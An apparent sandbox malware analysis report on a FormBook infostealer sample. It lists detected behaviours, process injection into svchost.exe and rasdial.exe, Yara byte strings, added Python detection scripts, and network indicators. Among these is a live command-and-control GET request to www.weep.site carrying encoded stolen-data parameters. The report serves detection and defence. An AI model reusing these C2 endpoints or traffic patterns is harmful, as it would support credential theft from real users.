
Windows Analysis Report
20-EM-00- PI-INQ-3001.exe

Overview

General Information

Sample name: 20-EM-00- PI-INQ-3001.exe
Analysis ID: 1503379
MD5: f295444b03c418b35dcb676ed284e846
SHA1: 314ca3515894c3d36b10653a7bace039a6991f19
SHA256: 594db372022016f6e585ebdba18d74c642ce91613bdb2925d11b0e499c9d46d9
Tags: exe

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 20-EM-00- PI-INQ-3001.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe" MD5: F295444B03C418B35DCB676ED284E846)
    • svchost.exe (PID: 7780 cmdline: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eVmdoPPWSZoVOB.exe (PID: 6016 cmdline: "C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 8104 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • firefox.exe (PID: 7400 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (columns: Source, Rule, Description, Author, Strings). The first field of a dump name is the process index used throughout the report (1 = svchost.exe, 5 = eVmdoPPWSZoVOB.exe, 6 = rasdial.exe), the fourth field is the base address of the dumped region.

  • Source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 (Yara detected FormBook, author: Joe Security)
    Rule: Windows_Trojan_Formbook_1112e116 (description: unknown, author: unknown)
      • 0x64446:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x4c7c5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 (Yara detected FormBook, author: Joe Security)
    Rule: Windows_Trojan_Formbook_1112e116 (description: unknown, author: unknown)
      • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 (Yara detected FormBook, author: Joe Security)
  (The full report lists 11 memory-dump entries; only the first three are reproduced here.)

Yara matches in unpacked PE files (same columns):

  • Source: 1.2.svchost.exe.400000.0.unpack
    Rule: JoeSecurity_FormBook_1 (Yara detected FormBook, author: Joe Security)
    Rule: Windows_Trojan_Formbook_1112e116 (description: unknown, author: unknown)
      • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • Source: 1.2.svchost.exe.400000.0.raw.unpack
    Rule: JoeSecurity_FormBook_1 (Yara detected FormBook, author: Joe Security)
    Rule: Windows_Trojan_Formbook_1112e116 (description: unknown, author: unknown)
      • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
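The two hex strings are the only part of the Windows_Trojan_Formbook_1112e116 rule the report reproduces. The Python below is an added example, not Joe Sandbox's or the rule author's code: it searches a raw dump for those two byte sequences and prints hits in the report's 0xOFFSET:$name form, so the offsets above can be reproduced from a saved .sdmp or unpacked PE. The toy condition (both strings present, which is what every hit in the report shows) and the constructed sample dump are assumptions; the rule's real condition and its remaining strings are not on the page.

```python
"""Reproduce the $a2/$a3 FormBook string hits from a raw memory dump.

Added example: a plain byte search, not the Yara rule itself.
"""
import sys

# The two hex strings exactly as the report lists them (20 bytes each).
# $a2 is a short x86 loop: jz +0x0a / dec esi / movzx ecx,[eax] / lea eax,[eax+ecx+1] /
# jnz -0x0a / lea esi,[eax+1] / movzx eax,[eax] / lea edx,[ebp+..], i.e. a walker over
# length-prefixed byte strings. $a3 is an sbb/and/add/cmp sequence on dl.
PATTERNS = {
    "$a2": bytes.fromhex("740A4E0FB6088D44080175F68D70010FB6008D55"),
    "$a3": bytes.fromhex("1AD280E2AF80C27EEB2A80FA2F75118AD080E201"),
}


def find_all(buf, pat):
    """Every offset of pat in buf, overlapping hits included."""
    hits, i = [], buf.find(pat)
    while i != -1:
        hits.append(i)
        i = buf.find(pat, i + 1)
    return hits


def scan(buf):
    """Offsets of each pattern, keyed by the rule's string name."""
    return {name: find_all(buf, pat) for name, pat in PATTERNS.items()}


def looks_like_formbook(buf):
    """Toy condition (assumption: the rule's actual condition is not on the page):
    both strings must be present, as in every hit the report lists."""
    return all(scan(buf).values())


def format_hits(hits):
    """Render hits the way the report does, e.g. '0x2e053:$a2'."""
    return [f"0x{off:x}:{name}" for name, offs in hits.items() for off in offs]


def build_sample_dump():
    """Constructed 0x30000-byte dump with the patterns placed at the offsets the report
    gives for 1.2.svchost.exe.400000.0.unpack (0x2e053 and 0x163d2)."""
    buf = bytearray(0x30000)  # zero filler; neither pattern can occur by accident
    buf[0x2E053:0x2E053 + 20] = PATTERNS["$a2"]
    buf[0x163D2:0x163D2 + 20] = PATTERNS["$a3"]
    return bytes(buf)


if __name__ == "__main__":
    # Usage: python formbook_scan.py <dump.sdmp>; with no argument the constructed dump is scanned.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    hits = scan(data)
    print("FormBook" if looks_like_formbook(data) else "no match", format_hits(hits))
```

Run it against the extracted 1.2.svchost.exe.400000.0.unpack file and the two offsets should come back exactly as the table shows; against the .raw.unpack file they shift by 0xe00, the difference between raw and virtual section layout.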

            System Summary

Source: Process started | Author: juju4 | Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe", ParentImage: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe, ParentProcessId: 6016, ParentProcessName: eVmdoPPWSZoVOB.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 8104, ProcessName: rasdial.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", CommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", ParentImage: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe, ParentProcessId: 7752, ParentProcessName: 20-EM-00- PI-INQ-3001.exe, ProcessCommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", ProcessId: 7780, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", CommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", ParentImage: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe, ParentProcessId: 7752, ParentProcessName: 20-EM-00- PI-INQ-3001.exe, ProcessCommandLine: "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe", ProcessId: 7780, ProcessName: svchost.exe
            No Suricata rule has matched
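The three Sigma hits are process-creation events, and the interesting field in two of them is not the image but the mismatch between Image (svchost.exe) and CommandLine (the sample's own path): the sample created svchost.exe suspended and replaced its code, so the hollowed process still carries the creator's command line. The Python below is an added example, not Joe Sandbox or Sigma code. It applies three checks a SOC would write for these events, against the three events as transcribed from the report plus one constructed benign services.exe-to-svchost.exe event. The allowlist of normal svchost.exe parents and the "parent outside C:\Windows" test for rasdial.exe are assumptions; the page does not reproduce the Sigma rules' own filters.

```python
"""Process-creation checks behind the three Sigma hits (added example, not Joe Sandbox code)."""
import ntpath

# Events transcribed from the report's Sigma output; the last one is a constructed benign baseline.
EVENTS = [
    {"ProcessId": 7780, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"',
     "ParentProcessId": 7752, "ParentImage": r"C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"},
    {"ProcessId": 8104, "Image": r"C:\Windows\SysWOW64\rasdial.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\rasdial.exe"',
     "ParentProcessId": 6016,
     "ParentImage": r"C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe"},
    {"ProcessId": 1234, "Image": r"C:\Windows\System32\svchost.exe",   # constructed: normal service host
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentProcessId": 700, "ParentImage": r"C:\Windows\System32\services.exe"},
]

# Assumption: typical legitimate parents of svchost.exe (the Sigma rule's real filter is not on the page).
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}


def first_token(cmdline):
    """Executable named by a Windows command line: a quoted path, or the text up to the first space."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def base(path):
    return ntpath.basename(path).lower()


def image_cmdline_mismatch(ev):
    """On-disk image differs from the executable the command line names: the footprint of a
    suspended-process hollow. PID 7780 is svchost.exe but carries the sample's command line."""
    return base(ev["Image"]) != base(first_token(ev["CommandLine"]))


def uncommon_svchost_parent(ev):
    """svchost.exe is normally started by services.exe or a few other system binaries."""
    return base(ev["Image"]) == "svchost.exe" and base(ev["ParentImage"]) not in SVCHOST_PARENTS


def rasdial_from_unusual_parent(ev):
    """rasdial.exe launched by a parent outside C:\\Windows; here a randomly named binary
    under Program Files (x86). Assumption: rasdial from a system parent is treated as benign."""
    return base(ev["Image"]) == "rasdial.exe" and not ev["ParentImage"].lower().startswith("c:\\windows\\")


RULES = {
    "image_cmdline_mismatch": image_cmdline_mismatch,
    "uncommon_svchost_parent": uncommon_svchost_parent,
    "rasdial_from_unusual_parent": rasdial_from_unusual_parent,
}


def evaluate(ev):
    """Names of the rules that fire on one event."""
    return [name for name, rule in RULES.items() if rule(ev)]


def run(events):
    """Map ProcessId -> fired rules for a batch of process-creation events."""
    return {ev["ProcessId"]: evaluate(ev) for ev in events}


if __name__ == "__main__":
    for pid, fired in run(EVENTS).items():
        print(pid, fired or "clean")
```

The image/command-line comparison is the one to keep: it needs no allowlist, and it survives the attacker swapping svchost.exe for another host (the report's own tree shows rasdial.exe being used next).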

            AV Detection

Source: http://www.weep.site/v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28 | Avira URL Cloud: Label: malware
Source: 20-EM-00- PI-INQ-3001.exe | ReversingLabs: Detection: 29%
Source: 20-EM-00- PI-INQ-3001.exe | Virustotal: Detection: 28%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 20-EM-00- PI-INQ-3001.exe | Joe Sandbox ML: detected
Source: 20-EM-00- PI-INQ-3001.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1922768601.00000000003FE000.00000002.00000001.01000000.00000005.sdmp
(This PDB path belongs to Joe Security's own FakeChrome decoy binary, and the dump is the initial image of eVmdoPPWSZoVOB.exe. The randomly named executable under Program Files (x86) is therefore a copy of a sandbox-provided program rather than attacker-supplied code, so its hash 32B8AD6ECA9094891E792631BAEA9717 is specific to this sandbox and should not be used as an IOC.)
Source: Binary string: wntdll.pdbUGP | source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1689488135.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp; 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1685743507.0000000004150000.00000004.00001000.00020000.00000000.sdmp; svchost.exe, 00000001.00000003.1909080883.0000000003400000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000001.00000003.1910744947.0000000003600000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000001.00000002.1999497224.000000000399E000.00000040.00001000.00020000.00000000.sdmp; svchost.exe, 00000001.00000002.1999497224.0000000003800000.00000040.00001000.00020000.00000000.sdmp; rasdial.exe, 00000006.00000003.2001345010.000000000484E000.00000004.00000020.00020000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531564056.0000000004A00000.00000040.00001000.00020000.00000000.sdmp; rasdial.exe, 00000006.00000003.1999168737.0000000004699000.00000004.00000020.00020000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531564056.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp
(wntdll.pdb is the debug symbol name of ntdll.dll itself. Finding it in additional private memory regions of the sample, svchost.exe and rasdial.exe, not only at ntdll's normal load address, fits a second, manually mapped copy of ntdll, which is consistent with the direct/indirect syscall signature listed above.)
Source: Binary string: rasdial.pdb | source: svchost.exe, 00000001.00000002.1995959984.0000000003200000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000001.00000003.1964917968.000000000321A000.00000004.00000020.00020000.00000000.sdmp; eVmdoPPWSZoVOB.exe, 00000005.00000003.1938759402.0000000000F74000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1689488135.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp; 20-EM-00- PI-INQ-3001.exe, 00000000.00000003.1685743507.0000000004150000.00000004.00001000.00020000.00000000.sdmp; svchost.exe; svchost.exe, 00000001.00000003.1909080883.0000000003400000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000001.00000003.1910744947.0000000003600000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000001.00000002.1999497224.000000000399E000.00000040.00001000.00020000.00000000.sdmp; svchost.exe, 00000001.00000002.1999497224.0000000003800000.00000040.00001000.00020000.00000000.sdmp; rasdial.exe; rasdial.exe, 00000006.00000003.2001345010.000000000484E000.00000004.00000020.00020000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531564056.0000000004A00000.00000040.00001000.00020000.00000000.sdmp; rasdial.exe, 00000006.00000003.1999168737.0000000004699000.00000004.00000020.00020000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531564056.0000000004B9E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: rasdial.pdbGCTL | source: svchost.exe, 00000001.00000002.1995959984.0000000003200000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000001.00000003.1964917968.000000000321A000.00000004.00000020.00020000.00000000.sdmp; eVmdoPPWSZoVOB.exe, 00000005.00000003.1938759402.0000000000F74000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.000000000333C000.00000004.80000000.00040000.00000000.sdmp; rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531860991.000000000502C000.00000004.10000000.00040000.00000000.sdmp; firefox.exe, 00000007.00000002.2283662036.000000003813C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: eVmdoPPWSZoVOB.exe, 00000005.00000002.3531950010.000000000333C000.00000004.80000000.00040000.00000000.sdmp; rasdial.exe, 00000006.00000002.3530968033.0000000002C19000.00000004.00000020.00020000.00000000.sdmp; rasdial.exe, 00000006.00000002.3531860991.000000000502C000.00000004.10000000.00040000.00000000.sdmp; firefox.exe, 00000007.00000002.2283662036.000000003813C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E54696: GetFileAttributesW, FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E5C9C7: FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E5C93C: FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E5F200: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E5F35D: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E5F65E: FindFirstFileW, Sleep, _wcscmp, _wcscmp, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E53A2B: FindFirstFileW, DeleteFileW, DeleteFileW, MoveFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E53D4E: FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E5BF27: FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose
Source: C:\Windows\SysWOW64\rasdial.exe | Code function 6_2_02A1C420: FindFirstFileW, FindNextFileW, FindClose
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | Code function 5_2_02AB2266: 4x nop then xor eax, eax
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | Code function 5_2_02AACDC3: 4x nop then pop edi
Source: C:\Windows\SysWOW64\rasdial.exe | Code function 6_2_02A09B60: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\rasdial.exe | Code function 6_2_02A0E109: 4x nop then pop edi
Source: C:\Windows\SysWOW64\rasdial.exe | Code function 6_2_047D04DF: 4x nop then mov ebx, 00000004h

            Networking

            Source: DNS query: www.jaxo.xyz
Source: Joe Sandbox View | IP Address: 176.57.64.102
Source: Joe Sandbox View | IP Address: 167.172.133.32
Source: Joe Sandbox View | IP Address: 18.183.3.45
Source: Joe Sandbox View | IP Address: 194.233.65.154
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 11 times)
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function 0_2_00E625E2: InternetReadFile, InternetQueryDataAvailable, InternetReadFile
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Sep 2024 11:54:56 GMTserver: Apacheset-cookie: __tad=1725364496.8828139; expires=Fri, 01-Sep-2034 11:54:56 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 
57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | date: Tue, 03 Sep 2024 11:54:59 GMT | server: Apache | set-cookie: __tad=1725364499.3792583; expires=Fri, 01-Sep-2034 11:54:59 GMT; Max-Age=315360000 | vary: Accept-Encoding | content-encoding: gzip | content-length: 577 | content-type: text/html; charset=UTF-8 | connection: close | Data Raw: 577-byte gzip body, byte-identical to the response above
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | date: Tue, 03 Sep 2024 11:55:01 GMT | server: Apache | set-cookie: __tad=1725364501.8386285; expires=Fri, 01-Sep-2034 11:55:01 GMT; Max-Age=315360000 | vary: Accept-Encoding | content-encoding: gzip | content-length: 577 | content-type: text/html; charset=UTF-8 | connection: close | Data Raw: 577-byte gzip body, byte-identical to the response above
Source: global traffic | HTTP traffic detected: GET /v1m8/?r8=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&VZ=qzwLUJ3Xbb28 HTTP/1.1 | Host: www.weep.site | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
